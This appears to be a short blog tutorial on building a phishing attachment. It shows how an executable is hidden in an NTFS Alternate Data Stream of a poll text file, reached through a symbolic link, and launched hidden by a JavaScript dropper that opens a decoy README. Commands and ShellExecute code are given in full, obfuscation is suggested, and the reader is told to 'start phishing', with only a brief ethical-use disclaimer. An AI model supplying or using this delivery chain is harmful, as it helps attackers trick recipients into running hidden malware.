Creating a Phishing Attack by Utilizing Alternate Data Streams

Recently I’ve been witnessing phishing attacks containing malicious Javascript files which call a more sophisticated malware from a Command & Control server in the wild. This kind of attacks seem to continue in coming years.

Let’s investigate the possibility of embedding a malware into a text file and calling it from Javascript without the need of a CC server.

In our scenario, we assume that we are sending four files (two of them preferrably hidden) inside a zipped directory as part of a Poll research:

1) The first file is Poll.txt file, which is parallel to the subject of our phishing attack. It contains some multiple choice questions inside.

Here our purpose is to embed malware.exe (here calc.exe) into Poll.txt. We need the following command to embed the exe into Alternate Data Streams field of the text file:

type calc.exe > Poll.txt:calc.exe

Now, we have Poll.txt embedded another exe file inside. You can verify this by using “dir /r” command.

2) It is not possible anymore calling an embedded file from within ADS field of a file. But there is a workaround for this. First, we need to create a symbolic link to the embedded file:

mklink config.txt Poll.txt:calc.exe

Now, if you’ll type ‘config.txt’ on command prompt, you’ll see calc.exe popping up (but double clicking on that file doesn’t have the same effect). You can make the file hidden by using its property options.

3) Create another text file README.txt and put some text into it. You can make that file hidden as well.

4) It is time to prepare Javascript file: README.js. This file is going to open both README.txt (visibly) and calc.exe (hiddenly).

var objShell = new ActiveXObject(“shell.application”);

objShell.ShellExecute(“cmd.exe”, “/c config.txt”, “”, “open”, 0);

objShell.ShellExecute(“README.txt”, “”, “”, “open”, 1);

You can obfuscate this code of course. I leave it to you.

This Javascript file cannot successfully run when called from a browser due to security considerations. You are welcome if you have any new idea about making it possible.

Phishing Attack

We are done. Now you can zip this directory and start phishing 🙂

(Please use such techniques only for ethical pen testing purposes, it is illegal to use otherwise and don’t be fool).